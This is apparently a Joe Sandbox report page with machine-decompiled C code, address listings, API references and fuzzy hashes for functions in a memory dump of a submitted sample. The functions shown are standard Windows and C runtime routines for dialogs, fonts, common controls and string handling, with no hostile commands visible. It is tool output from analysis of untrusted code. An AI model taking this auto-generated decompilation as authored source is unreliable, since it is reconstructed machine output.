                                                                              0x0041ec7d
                                                                              0x0041ec88
                                                                              0x0041ec88
                                                                              0x0041ec8a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ec7f
                                                                              0x0041ec82
                                                                              0x0041ec84
                                                                              0x0041ec87
                                                                              0x0041ec87
                                                                              0x00000000
                                                                              0x0041ec87
                                                                              0x00000000
                                                                              0x0041ec82
                                                                              0x0041ec8c
                                                                              0x0041ec8e
                                                                              0x0041ec90
                                                                              0x0041ec91
                                                                              0x0041ec91
                                                                              0x0041ec91
                                                                              0x0041ec94
                                                                              0x0041ec94
                                                                              0x0041ec96
                                                                              0x0041ec98
                                                                              0x0041ec98
                                                                              0x0041ec9a
                                                                              0x0041eca0
                                                                              0x00000000
                                                                              0x0041eca0
                                                                              0x0041ebba
                                                                              0x0041ebbd
                                                                              0x0041ebbf
                                                                              0x0041ebc1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ebc1
                                                                              0x0041ead5
                                                                              0x0041eadc
                                                                              0x0041eae1
                                                                              0x0041eaef
                                                                              0x00000000
                                                                              0x0041eaf1
                                                                              0x0041eaf1
                                                                              0x00000000
                                                                              0x0041eaf1
                                                                              0x0041eaf8
                                                                              0x0041eaf8
                                                                              0x0041eaf8
                                                                              0x0041eafb
                                                                              0x0041eb12
                                                                              0x0041eb12
                                                                              0x0041eb14
                                                                              0x00000000
                                                                              0x0041eb16
                                                                              0x0041eb16
                                                                              0x0041eb1a
                                                                              0x00000000
                                                                              0x0041eb1c
                                                                              0x0041eb1c
                                                                              0x00000000
                                                                              0x0041eb1c
                                                                              0x0041eb1a
                                                                              0x0041eafd
                                                                              0x0041eafd
                                                                              0x0041eb03
                                                                              0x00000000
                                                                              0x0041eb05
                                                                              0x0041eb05
                                                                              0x0041eb09
                                                                              0x0041eb39
                                                                              0x0041eb39
                                                                              0x0041eb3e
                                                                              0x0041eb41
                                                                              0x0041eb42
                                                                              0x0041eb47
                                                                              0x0041eb0b
                                                                              0x0041eb0b
                                                                              0x0041eb21
                                                                              0x0041eb24
                                                                              0x0041eb25
                                                                              0x0041eb2a
                                                                              0x0041eb2a
                                                                              0x0041eb09
                                                                              0x0041eb03
                                                                              0x0041eafb
                                                                              0x0041eb2e
                                                                              0x0041eca5
                                                                              0x0041eca5
                                                                              0x0041eca5
                                                                              0x0041ebc3
                                                                              0x0041ebc3
                                                                              0x0041ebc3
                                                                              0x0041ecc6
                                                                              0x0041ecc6
                                                                              0x0041eccc
                                                                              0x0041ecd0
                                                                              0x0041ecd4
                                                                              0x0041ecd8
                                                                              0x0041ecd8
                                                                              0x0041ecb4

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcat$___shr_12
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                              • API String ID: 1152255961-4131533671
                                                                              • Opcode ID: bc08e7d89d2bb6202aeacce8bb6cff8cc1f909d0250d6a3ad86d50561d1589ea
                                                                              • Instruction ID: bdc97a90c6a41f82a9cd33cd0c27e1fe5640516d42d63c26ed1cf3eaf4c48473
                                                                              • Opcode Fuzzy Hash: bc08e7d89d2bb6202aeacce8bb6cff8cc1f909d0250d6a3ad86d50561d1589ea
                                                                              • Instruction Fuzzy Hash: BD81163580429A8EDF11CB69C9447EFBBB4AF21314F08455BEC51DB282E3789685C7A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004249D9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E004249D9(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E004128A0(E00430DBD, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E0042D179() + 0xc);
				}
				_t135 =  *(E0042D179() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E0042605F(_t109, 0x10);
				E0042605F(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E00428A50();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E004299D5(_t139, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x45a364; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E004276F9();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E00424470, 0);
							E00401000( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E004264AE();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E004299A6(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E00429908(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E004296BC(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E004296AE(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E004132A8( *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}





















                                                                              0x004249d9
                                                                              0x004249de
                                                                              0x004249ee
                                                                              0x004249f0
                                                                              0x004249f3
                                                                              0x004249f6
                                                                              0x00424a00
                                                                              0x00424a00
                                                                              0x00424a08
                                                                              0x00424a10
                                                                              0x00424a13
                                                                              0x00424a16
                                                                              0x00424a19
                                                                              0x00424a1c
                                                                              0x00424a26
                                                                              0x00424a2d
                                                                              0x00424a5a
                                                                              0x00424a5d
                                                                              0x00424a5d
                                                                              0x00424a5f
                                                                              0x00424a41
                                                                              0x00424a41
                                                                              0x00424bd5
                                                                              0x00424bda
                                                                              0x00424be3
                                                                              0x00424be3
                                                                              0x00424a61
                                                                              0x00424a66
                                                                              0x00424a70
                                                                              0x00424a7c
                                                                              0x00424a80
                                                                              0x00424a8d
                                                                              0x00424a92
                                                                              0x00424a98
                                                                              0x00424a9a
                                                                              0x00424ad2
                                                                              0x00424ad2
                                                                              0x00424ad4
                                                                              0x00424b15
                                                                              0x00424b15
                                                                              0x00424b19
                                                                              0x00424b1d
                                                                              0x00424b1e
                                                                              0x00424b23
                                                                              0x00424b26
                                                                              0x00424b28
                                                                              0x00424b2e
                                                                              0x00424b2a
                                                                              0x00424b2a
                                                                              0x00424b2a
                                                                              0x00424b48
                                                                              0x00424b4a
                                                                              0x00424b6e
                                                                              0x00424b71
                                                                              0x00424b75
                                                                              0x00424b77
                                                                              0x00424b7f
                                                                              0x00424b82
                                                                              0x00424b84
                                                                              0x00424b8b
                                                                              0x00424b8b
                                                                              0x00424b84
                                                                              0x00424b91
                                                                              0x00424b96
                                                                              0x00424b98
                                                                              0x00424b9e
                                                                              0x00424b9e
                                                                              0x00424ba4
                                                                              0x00424ba6
                                                                              0x00424ba8
                                                                              0x00424bac
                                                                              0x00424baf
                                                                              0x00424bb5
                                                                              0x00424bb5
                                                                              0x00424bb5
                                                                              0x00424bac
                                                                              0x00424bb7
                                                                              0x00424bba
                                                                              0x00424bbf
                                                                              0x00424bc8
                                                                              0x00424bc8
                                                                              0x00424bd0
                                                                              0x00424bd2
                                                                              0x00424bd2
                                                                              0x00424bd2
                                                                              0x00000000
                                                                              0x00424bd2
                                                                              0x00424ad6
                                                                              0x00424ada
                                                                              0x00424ae5
                                                                              0x00424ae9
                                                                              0x00424af9
                                                                              0x00424afc
                                                                              0x00424b00
                                                                              0x00424b05
                                                                              0x00424b08
                                                                              0x00424b13
                                                                              0x00424b13
                                                                              0x00000000
                                                                              0x00424b08
                                                                              0x00424a9c
                                                                              0x00424a9e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424aa2
                                                                              0x00424aa8
                                                                              0x00424aaa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424ab4
                                                                              0x00424abb
                                                                              0x00424abf
                                                                              0x00424ac2
                                                                              0x00424ac6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424ac8
                                                                              0x00424acd
                                                                              0x00424acf
                                                                              0x00424acf
                                                                              0x00000000
                                                                              0x00424acd
                                                                              0x00424a34
                                                                              0x00424a3f
                                                                              0x00424a56
                                                                              0x00000000
                                                                              0x00424a56
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004249DE
                                                                              • GetSystemMetrics.USER32 ref: 00424AA2
                                                                              • GlobalLock.KERNEL32 ref: 00424B0D
                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,Function_00024470,00000000), ref: 00424B3C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                              • String ID: MS Shell Dlg
                                                                              • API String ID: 2364537584-76309092
                                                                              • Opcode ID: ad94d330b533e1bcc8f2f09ff8cb8db99c94e592d6dbf8400f4186f422917a1d
                                                                              • Instruction ID: 330e556eb1524598ba7eb11baf331d4e34cb7b5cbbed86dc3fc3bb5d114f69ae
                                                                              • Opcode Fuzzy Hash: ad94d330b533e1bcc8f2f09ff8cb8db99c94e592d6dbf8400f4186f422917a1d
                                                                              • Instruction Fuzzy Hash: 0751D231A00225DFCF11EFA4E845AEEBBB4EF84314F54056AE412E7292D7789D81CB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004158EC, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 51%
                                                                              			E004158EC(void* __ecx, intOrPtr _a4, signed int _a8) {
				intOrPtr _t19;
				signed int _t21;
				signed int _t22;
				void* _t24;
				intOrPtr _t31;
				void* _t33;
				intOrPtr _t35;
				intOrPtr* _t36;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t33 = __ecx;
				_t35 = _a4;
				E00412140(_t35, 0, 0x90);
				_t37 = _a8;
				_t19 =  *_t37;
				_t39 = _t38 + 0xc;
				if(_t19 == 0) {
					L4:
					return 0;
				}
				if(_t19 != 0x2e) {
					L5:
					_a8 = _a8 & 0x00000000;
					while(1) {
						_t21 = E00419CA0(_t33, _t37, "_.,");
						_pop(_t33);
						if(_t21 == 0) {
							break;
						}
						_t36 = _t21 + _t37;
						_t31 =  *_t36;
						if(_a8 != 0) {
							if(_a8 != 1) {
								if(_a8 != 2 || _t21 >= 0x10 || _t31 != 0 && _t31 != 0x2c) {
									break;
								} else {
									_push(_t21);
									_t24 = _a4 + 0x80;
									L19:
									_push(_t37);
									_push(_t24);
									L20:
									E0041ADB0();
									_t39 = _t39 + 0xc;
									if(_t31 == 0x2c || _t31 == 0) {
										_t22 = 0;
										L25:
										return _t22;
									} else {
										_a8 = _a8 + 1;
										_t37 = _t36 + 1;
										continue;
									}
								}
							}
							if(_t21 >= 0x40 || _t31 == 0x5f) {
								break;
							} else {
								_push(_t21);
								_t24 = _a4 + 0x40;
								goto L19;
							}
						}
						if(_t21 >= 0x40 || _t31 == 0x2e) {
							break;
						} else {
							_push(_t21);
							_push(_t37);
							_push(_a4);
							goto L20;
						}
					}
					_t22 = _t21 | 0xffffffff;
					goto L25;
				}
				_t27 = _t37 + 1;
				if( *((char*)(_t37 + 1)) == 0) {
					goto L5;
				}
				E0041ADB0(_t35 + 0x80, _t27, 0xf);
				 *((char*)(_t35 + 0x8f)) = 0;
				goto L4;
			}














                                                                              0x004158ec
                                                                              0x004158f1
                                                                              0x004158fc
                                                                              0x00415901
                                                                              0x00415904
                                                                              0x00415906
                                                                              0x0041590b
                                                                              0x00415932
                                                                              0x00000000
                                                                              0x00415932
                                                                              0x0041590f
                                                                              0x00415939
                                                                              0x00415939
                                                                              0x004159ab
                                                                              0x004159b1
                                                                              0x004159b9
                                                                              0x004159ba
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415944
                                                                              0x00415947
                                                                              0x00415949
                                                                              0x00415960
                                                                              0x00415979
                                                                              0x00000000
                                                                              0x00415989
                                                                              0x00415989
                                                                              0x0041598d
                                                                              0x00415992
                                                                              0x00415992
                                                                              0x00415993
                                                                              0x00415994
                                                                              0x00415994
                                                                              0x00415999
                                                                              0x0041599f
                                                                              0x004159c4
                                                                              0x004159bf
                                                                              0x00000000
                                                                              0x004159a5
                                                                              0x004159a5
                                                                              0x004159a8
                                                                              0x00000000
                                                                              0x004159a8
                                                                              0x0041599f
                                                                              0x00415979
                                                                              0x00415965
                                                                              0x00000000
                                                                              0x0041596c
                                                                              0x0041596c
                                                                              0x00415970
                                                                              0x00000000
                                                                              0x00415970
                                                                              0x00415965
                                                                              0x0041594e
                                                                              0x00000000
                                                                              0x00415955
                                                                              0x00415955
                                                                              0x00415956
                                                                              0x00415957
                                                                              0x00000000
                                                                              0x00415957
                                                                              0x0041594e
                                                                              0x004159bc
                                                                              0x00000000
                                                                              0x004159bc
                                                                              0x00415911
                                                                              0x00415917
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415923
                                                                              0x0041592b
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strncpy$_strcspn
                                                                              • String ID: ,$,$.$_$_.,
                                                                              • API String ID: 209312476-1893563293
                                                                              • Opcode ID: f76e61240114efc4bef41cd4e5516df8a96ead8180aaed60b9a11de01cae27a7
                                                                              • Instruction ID: cd4318613fc8f866815621c17c04b6bdb5c0170a03521b7116e98623aa085235
                                                                              • Opcode Fuzzy Hash: f76e61240114efc4bef41cd4e5516df8a96ead8180aaed60b9a11de01cae27a7
                                                                              • Instruction Fuzzy Hash: 6621E5B1561946FDFF308A25C801BEB3759AB92374F188417F9498B282D33C99C5879F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00429908, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00429908(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x457184; // 0xc72e1596
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E00412FBB(E004297D0(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}












                                                                              0x0042990e
                                                                              0x00429915
                                                                              0x0042991e
                                                                              0x00429921
                                                                              0x00429924
                                                                              0x00429927
                                                                              0x0042992c
                                                                              0x00429930
                                                                              0x0042993a
                                                                              0x00429949
                                                                              0x0042994d
                                                                              0x0042995a
                                                                              0x0042995c
                                                                              0x0042995e
                                                                              0x0042995e
                                                                              0x00429979
                                                                              0x0042997b
                                                                              0x0042997b
                                                                              0x00429981
                                                                              0x00429986
                                                                              0x00429988
                                                                              0x00429988
                                                                              0x004299a3
                                                                              0x004299a3
                                                                              0x00429934
                                                                              0x00429938
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • GetStockObject.GDI32(00000011), ref: 0042992C
                                                                              • GetStockObject.GDI32(0000000D), ref: 00429934
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 00429941
                                                                              • GetDC.USER32(00000000), ref: 00429950
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00429964
                                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00429970
                                                                              • ReleaseDC.USER32 ref: 0042997B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                              • String ID: System
                                                                              • API String ID: 46613423-3470857405
                                                                              • Opcode ID: 450ddf9b251880a93b6c8adec8f45b3a5c6e0e7d1307f96023e75738f48cb576
                                                                              • Instruction ID: e77bea6ff984db64622139dd441a974045562c9bc65b1df99976ca27c7404182
                                                                              • Opcode Fuzzy Hash: 450ddf9b251880a93b6c8adec8f45b3a5c6e0e7d1307f96023e75738f48cb576
                                                                              • Instruction Fuzzy Hash: 2611BF71B00218EBEB109FA0ED45BAE7B78FB44754F40402AF605A6290D7B89D42CBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425947, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 40%
                                                                              			E00425947(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}









                                                                              0x0042594a
                                                                              0x00425957
                                                                              0x00425959
                                                                              0x0042595f
                                                                              0x00425963
                                                                              0x004259bc
                                                                              0x00425965
                                                                              0x0042596b
                                                                              0x0042596d
                                                                              0x00425975
                                                                              0x00425992
                                                                              0x0042599a
                                                                              0x0042599e
                                                                              0x004259a2
                                                                              0x004259a4
                                                                              0x004259aa
                                                                              0x004259aa
                                                                              0x004259a2
                                                                              0x00425977
                                                                              0x00425986
                                                                              0x00425988
                                                                              0x0042598e
                                                                              0x0042598e
                                                                              0x00425986
                                                                              0x004259b1
                                                                              0x00000000
                                                                              0x004259b7

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,004262F9,?,00040000), ref: 00425950
                                                                              • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00425959
                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0042596D
                                                                              • #17.COMCTL32 ref: 00425988
                                                                              • #17.COMCTL32 ref: 004259A4
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004259B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                              • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                              • API String ID: 1437655972-4218389149
                                                                              • Opcode ID: 02f9f2db7425b3481627d31e585d5f200e928fcb464cc0c10b18e8231ce32bbf
                                                                              • Instruction ID: bdb602d294863cf9800f5fb213bfd1d93958a693a90a29ccf5b0ef3496ef9c33
                                                                              • Opcode Fuzzy Hash: 02f9f2db7425b3481627d31e585d5f200e928fcb464cc0c10b18e8231ce32bbf
                                                                              • Instruction Fuzzy Hash: AAF0A472B05632C7A7119B64BD4862BB6A8BF94371B565432FD00E3220CBB8DC45867E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041F4BE, Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0041F4BE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				short* _t163;
				int _t166;
				void* _t167;
				int _t168;
				void* _t169;
				short* _t170;
				void* _t175;

				_push(0x40);
				_push(0x44dd38);
				E00412BA4(__ebx, __edi, __esi);
				_t94 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t169 - 0x1c)) = _t94;
				_t162 = 0;
				_t166 = 1;
				_t175 =  *0x45a8c4 - _t162; // 0x0
				if(_t175 == 0) {
					if(CompareStringW(0, 0, 0x44bd1c, 1, 0x44bd1c, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x45a8c4 = 2;
						}
					} else {
						 *0x45a8c4 = 1;
					}
				}
				if( *(_t169 + 0x14) > _t162) {
					 *(_t169 + 0x14) = E0041F4A2( *(_t169 + 0x10),  *(_t169 + 0x14));
				}
				_t95 =  *(_t169 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E0041F4A2( *(_t169 + 0x18), _t95);
					 *(_t169 + 0x1c) = _t95;
				}
				_t144 =  *0x45a8c4; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t169 - 0x38) = _t162;
					__eflags =  *(_t169 + 8) - _t162;
					if( *(_t169 + 8) == _t162) {
						_t109 =  *0x45a730; // 0x0
						 *(_t169 + 8) = _t109;
					}
					_t142 =  *(_t169 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x45a740; // 0x0
					}
					_t167 = E0041AED4( *(_t169 + 8));
					__eflags = _t167 - 0xffffffff;
					if(_t167 != 0xffffffff) {
						__eflags = _t167 - _t142;
						if(__eflags == 0) {
							L67:
							_t166 = CompareStringA( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 + 0x10),  *(_t169 + 0x14),  *(_t169 + 0x18),  *(_t169 + 0x1c));
							__eflags = _t162;
							if(_t162 != 0) {
								_push(_t162);
								E00412A4D();
								_push( *(_t169 - 0x38));
								E00412A4D();
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x14);
						_push( *(_t169 + 0x10));
						_push(_t167);
						_push(_t142);
						_t162 = E0041AF17(_t142, _t162, _t167, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x1c);
						_push( *(_t169 + 0x18));
						_push(_t167);
						_push(_t142);
						_t106 = E0041AF17(_t142, _t162, _t167, __eflags);
						 *(_t169 - 0x38) = _t106;
						__eflags = _t106;
						if(_t106 != 0) {
							 *(_t169 + 0x10) = _t162;
							 *(_t169 + 0x18) =  *(_t169 - 0x38);
							goto L67;
						}
						_push(_t162);
						E00412A4D();
					}
					goto L61;
				} else {
					if(_t144 != _t166) {
